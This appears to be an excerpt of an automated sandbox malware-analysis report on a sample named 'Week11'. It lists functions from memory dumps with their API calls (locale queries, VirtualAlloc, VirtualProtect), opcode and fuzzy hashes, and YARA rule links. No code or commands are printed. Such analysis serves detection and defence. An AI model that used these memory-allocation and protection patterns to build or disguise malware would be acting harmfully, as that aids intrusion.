                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 34752b38b2754b7ca52bba39deff241d602bd1ca06e32a1ba814b5e0aa850dfe
                                • Instruction ID: cf84eb3affba9a7c58ce437095ece6ceda59a3e1f92058d5636929faadebe907
                                • Opcode Fuzzy Hash: 34752b38b2754b7ca52bba39deff241d602bd1ca06e32a1ba814b5e0aa850dfe
                                • Instruction Fuzzy Hash: 9261BEB1D046699FEB24CF24DD80AEAB7B5FF84300F1041FAD949A6241E6385EC6CF65
                                Function 00416CA5 Relevance: 1.6, APIs: 1, Instructions: 137nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 8d0192dd0f5896126fc7ff6dfbb567c905dcaa6bf0117c013203f66975b3b8bf
                                • Instruction ID: 1028634a6bf4f8049a259c7867131b0f5d336b0347058969114afb50d522907d
                                • Opcode Fuzzy Hash: 8d0192dd0f5896126fc7ff6dfbb567c905dcaa6bf0117c013203f66975b3b8bf
                                • Instruction Fuzzy Hash: B3412BB2E08528ABE7248B14EC90BE7BB79EF41310F1541FBD84D96541D33C9AC2CE92
                                Function 00417022 Relevance: 1.6, APIs: 1, Instructions: 134nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 03b83186ecf23a8079fecdafceb0ad7b2bf641fe006b3c9ea8605ab7f265595d
                                • Instruction ID: b7d811c6d2bb5e259764b7a113c416bce8973ca7d2948076c3acdb6140548a33
                                • Opcode Fuzzy Hash: 03b83186ecf23a8079fecdafceb0ad7b2bf641fe006b3c9ea8605ab7f265595d
                                • Instruction Fuzzy Hash: D141E7B1C4C3A9ABD7248B64CC907E67BB4EB01314F1445EFD98997241E6388AC68B56
                                Function 00416CB0 Relevance: 1.6, APIs: 1, Instructions: 133nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 59ef3bb343ccb5e1dc795bef17398f3df400dbea5bbcbae35d9b2a93684dc631
                                • Instruction ID: 10ab5086ccf39943dbca8d18a34557127348a894a2eb6a419f6d153ec376d46d
                                • Opcode Fuzzy Hash: 59ef3bb343ccb5e1dc795bef17398f3df400dbea5bbcbae35d9b2a93684dc631
                                • Instruction Fuzzy Hash: E84119B2E041685BE7248A15DC90BE77B79EB41320F1541FBD84D96141D33C9AC2CE92
                                Function 00416CCA Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 0d918f5b9963b250515dccaacc08a8527288cd87e552eb7d49bef6961426946f
                                • Instruction ID: bf31712f180945f5532ac7c0dfe1127d151f636112b3bf4659d251a4013e6da2
                                • Opcode Fuzzy Hash: 0d918f5b9963b250515dccaacc08a8527288cd87e552eb7d49bef6961426946f
                                • Instruction Fuzzy Hash: 4D4118B2E041685BE7248B15EC90BE7BB79EF41320F1541FBD84996541D33C9FC28E92
                                Function 004169EC Relevance: 1.6, APIs: 1, Instructions: 125nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 9df6a4139d0d2340a4e7d129edab66884f2382b7773cc859605464fd8f4c8c60
                                • Instruction ID: aeb2097c590350ad6ee95054d537edc73b8af0d380c24e94857321f6353d3bcf
                                • Opcode Fuzzy Hash: 9df6a4139d0d2340a4e7d129edab66884f2382b7773cc859605464fd8f4c8c60
                                • Instruction Fuzzy Hash: E841F4B2D04228AFE7248B24DC90BE77B78EF05310F1541FAD94D96641E23C9FC68E92
                                Function 00416817 Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 85424e1e67ac8c9145b9db495f4daf2206b09570989eb91425ba81a9d0bbb0d3
                                • Instruction ID: e4f1cecde8d617e0ccbf1f1b82d8ebb92770803450cfe7a5806b6b76b92339ae
                                • Opcode Fuzzy Hash: 85424e1e67ac8c9145b9db495f4daf2206b09570989eb91425ba81a9d0bbb0d3
                                • Instruction Fuzzy Hash: BE4138B2D092549FE7108B25DC447F77B75EF82710F1680FBE84986542E23C9AC79B62
                                Function 004168F4 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: d711917c81ac227287c1750c0a239f9db3dfe0aa47d58f1dab333508e2fd9e91
                                • Instruction ID: d94f48bccc68e64d8e14564b099fed645b82ada4d70b08f588de47d584cdd56e
                                • Opcode Fuzzy Hash: d711917c81ac227287c1750c0a239f9db3dfe0aa47d58f1dab333508e2fd9e91
                                • Instruction Fuzzy Hash: 343124F2D08158AFE7208A21DC80BF77B79EB82314F1580FAD94986581D23C5AC78F52
                                Function 00417133 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 63c791266eb70461723bb68008e4cf346df16934014055f5d397327415662198
                                • Instruction ID: 2ffd8c8c47cb39308c457f991e7b39201cca25e0530b53e3e4a9738c42e267a8
                                • Opcode Fuzzy Hash: 63c791266eb70461723bb68008e4cf346df16934014055f5d397327415662198
                                • Instruction Fuzzy Hash: 1D41C1B1D082589FDB24CB20CC907E677B4FF42310F2445EAD84897241E6399AC6CF16
                                Function 004166AE Relevance: 1.6, APIs: 1, Instructions: 98nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: d57f6e15d686dfbf528cfcf1814c6aa9e2e2efbae599cdf643a6c335a312484a
                                • Instruction ID: 774b0fec5aa23574fe4b3cdad8a22e809be80c94f210ab0822c5a119745d117e
                                • Opcode Fuzzy Hash: d57f6e15d686dfbf528cfcf1814c6aa9e2e2efbae599cdf643a6c335a312484a
                                • Instruction Fuzzy Hash: D53148F2D18654AFF7108A24DC84BF73B79EBD1314F1680FBD94846981D23C5AC78A52
                                Function 0041718B Relevance: 1.6, APIs: 1, Instructions: 85nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 5b2f8ecec2483b2cca8d30ead51cf55cd3240ab035214208f4480a31cd816b10
                                • Instruction ID: 67db15b722ca470fe7faa6546b2a550478ee8e4cc3aeb9d25c4160829336223a
                                • Opcode Fuzzy Hash: 5b2f8ecec2483b2cca8d30ead51cf55cd3240ab035214208f4480a31cd816b10
                                • Instruction Fuzzy Hash: E131C3B1C082999FD724CB24CC907E67BB4FF01314F2445EED84897282E6389AC6CF55
                                Function 0041741B Relevance: 1.6, APIs: 1, Instructions: 78nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: d02776d87926c49c3a205901e74d72355ed4ddbe3465c53d52234269d0351399
                                • Instruction ID: 3df9888577b18123dd39ea62242d633e8315d7f160ccfc61a4e9d6eb8b90d62a
                                • Opcode Fuzzy Hash: d02776d87926c49c3a205901e74d72355ed4ddbe3465c53d52234269d0351399
                                • Instruction Fuzzy Hash: 6F21F6B1D085999BD720CB15CC90BEBBBB4FF46310F1881EAD88997642D2385AC6CF52
                                Function 00417430 Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 9d6fd4aa9e04aab29d42247b339925ea5cf3aa601b34c3a9c3dcde2bb8b7dff7
                                • Instruction ID: fa18beae47fcdfa1cd365837ec87f141bfd18453a3f180c476c69577d8581926
                                • Opcode Fuzzy Hash: 9d6fd4aa9e04aab29d42247b339925ea5cf3aa601b34c3a9c3dcde2bb8b7dff7
                                • Instruction Fuzzy Hash: 7D21C7B1D086999FDB20CB14CC907EABBB4FF46314F1441EAD88997641E2385EC6CF52
                                Function 00416993 Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 1483383765f1cfd51dcce7d230b2c17b66b595a48f1c50d2a0b1735e8012bb66
                                • Instruction ID: f398059b22583b82b339f0c3e3e8fbf34d72fffc4ee610571627a6a97187914e
                                • Opcode Fuzzy Hash: 1483383765f1cfd51dcce7d230b2c17b66b595a48f1c50d2a0b1735e8012bb66
                                • Instruction Fuzzy Hash: 84113AF1D0C2949FE7108B25DC90BE67B78EF42310F1980FFD94886542D23C9AC68B52
                                Function 00416DDA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 5174a2dd9217f9427674ceb0c2f3f3c1d7a42abe70441ef0711f9bf011556f77
                                • Instruction ID: a9473657e0555dd9abd3046f59b2817e3b0620f52b60ee51d76898ed3679e195
                                • Opcode Fuzzy Hash: 5174a2dd9217f9427674ceb0c2f3f3c1d7a42abe70441ef0711f9bf011556f77
                                • Instruction Fuzzy Hash: 20112CB2C486999FD3108B25DC907E77BB8EF11314F1901FAC889C6542D13D9AC6CF92
                                Function 0041D440 Relevance: 1.5, APIs: 1, Instructions: 215memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 83dda0267fe6caebd37a7546cbe13cdd92656f67d7c5b6635a846884c4297c32
                                • Instruction ID: 390ed91ab8c7184ca9a65bb72a4321b19e25c97645b9654796fd61a692fd19ff
                                • Opcode Fuzzy Hash: 83dda0267fe6caebd37a7546cbe13cdd92656f67d7c5b6635a846884c4297c32
                                • Instruction Fuzzy Hash: 4481CEB1D042289BEB248B14DC44BEAB775EF84314F1481FAD90E67340E6786EC1CB96
                                Function 0041DDAA Relevance: 47.5, APIs: 1, Strings: 26, Instructions: 221memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
